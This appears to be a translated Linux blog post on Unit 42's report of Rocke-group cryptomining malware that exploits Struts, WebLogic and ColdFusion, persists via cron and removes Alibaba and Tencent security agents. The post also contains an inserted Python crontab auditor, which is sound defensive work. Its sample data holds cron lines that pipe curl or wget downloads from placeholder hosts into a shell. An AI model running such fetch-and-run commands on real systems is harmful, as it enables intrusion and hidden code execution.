New malware discovered. It seems that it can replace security software with a cryptocurrency miner.
It is common to hear the statement "Linux has no viruses", and that is far from reality. It is true that Linux-based systems have a very high level of security, and even simple tasks such as installing an application require administrator permission.
But it is not immune to failures, much less invulnerable, as the popular saying goes.
Linux vs. Virus
Even though it is not so simple to be infected on Linux, such threats exist, and every day new cases occur. Sometimes fanciful hawks, other greens.
Security researchers at Unit 42 warn of new malware for Linux. Palo Alto Networks, a leader in cyber security, recently discovered malware that exploits vulnerabilities in Apache Struts 2, Oracle WebLogic and Adobe ColdFusion to inject a malicious script called a7. This script persists using cron jobs. Cron is a software utility that automatically schedules and performs tasks on the operating system.
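A defender can look for this kind of cron persistence by auditing crontab entries. The Python below is an added example, not code from the article or from the researchers; the sample crontab lines, the hosts and the heuristics are constructed assumptions, and only the script name a7 comes from the text above.

```python
import re

# Constructed /etc/cron.d-style sample (system format, with a user field).
# Hosts and paths are placeholders, not indicators from the article.
SAMPLE = """\
# m h dom mon dow user command
MAILTO=root
17 * * * * root run-parts /etc/cron.hourly
0 3 * * * backup /usr/bin/curl -s -o /srv/b.tgz https://backup.example.invalid/b.tgz
*/10 * * * * root curl -fsSL http://files.example.invalid/a7 | sh
@reboot root /var/tmp/.cache/updater
*/5 * * * * www wget -qO- http://files.example.invalid/i.sh | bash -s
""".splitlines()

# Heuristics (assumptions of this example, except the a7 name from the article).
CHECKS = {
    "fetch-to-shell": re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|da|z)?sh\b"),
    "script-named-a7": re.compile(r"(^|[\s/])a7(\s|$)"),
    "runs-from-temp-dir": re.compile(r"^(\S*sh\s+)?(/tmp|/var/tmp|/dev/shm)/"),
}
SCHEDULE = re.compile(r"^(@\w+|(\S+\s+){4}\S+)\s+(?P<rest>.+)$")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def cron_command(line, system_format=False):
    """Return the command of a crontab line, or None for comments, env lines, junk."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    m = SCHEDULE.match(line)
    if not m:
        return None
    rest = m.group("rest")
    if system_format:  # /etc/crontab and /etc/cron.d/* name the user before the command
        parts = rest.split(None, 1)
        rest = parts[1] if len(parts) == 2 else ""
    return rest.strip() or None


def audit(lines, system_format=False):
    """Return (line_number, [matched check names], command) for suspicious jobs."""
    findings = []
    for number, line in enumerate(lines, 1):
        command = cron_command(line, system_format)
        if command is None:
            continue
        reasons = [name for name, rx in CHECKS.items() if rx.search(command)]
        if reasons:
            findings.append((number, reasons, command))
    return findings
```

Calling `audit(SAMPLE, system_format=True)` flags the three constructed jobs on lines 5, 6 and 7 and leaves the routine `run-parts` and backup download jobs alone.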
The mining malware
Once it has infected the server, the malware removes security software from the system. It hides its malicious process, kills any other processes that rely on iptables rules, and also mines cryptocurrencies.
With every stage complete, it starts mining the Monero coin, which resembles Bitcoin.
Attributed to the Rocke cracker group, the software appears to look specifically for 5 cloud security monitoring and protection products.
Interestingly, all vulnerable security solutions are from Chinese companies:
- Alibaba Threat Detection Service agent (AI-based detection engine);
- Alibaba CloudMonitor agent (RAM Consumption Monitor, CPU, Network Connectivity);
- Alibaba Cloud Assistant agent (Software that manages instances automatically);
- Tencent Host Security agent (AI-based detection engine);
- Tencent Cloud Monitor agent (Network Connectivity Monitor and Manager).
A trend among malware
The Palo Alto Networks research team has already contacted companies that offer such solutions. It is now up to Alibaba and Tencent to address such vulnerabilities.
The researchers who discovered the malware see it as a possible trend among cybercriminals and believe that this model will increasingly be employed by crackers.
Like most virus cases on Linux, the problem is caused by some vulnerability in other software and the way it is managed. With security updates, such possibilities are reduced, and once the vulnerabilities are corrected such problems are soon remedied.
And you, did you know that Linux also catches viruses? Or did you believe that it does not? Don't forget to visit the linked post, where we explain everything about "Linux does not catch viruses".
I'll wait for you in the next post, SYSTEMATICALLY, here on the Diolinux blog.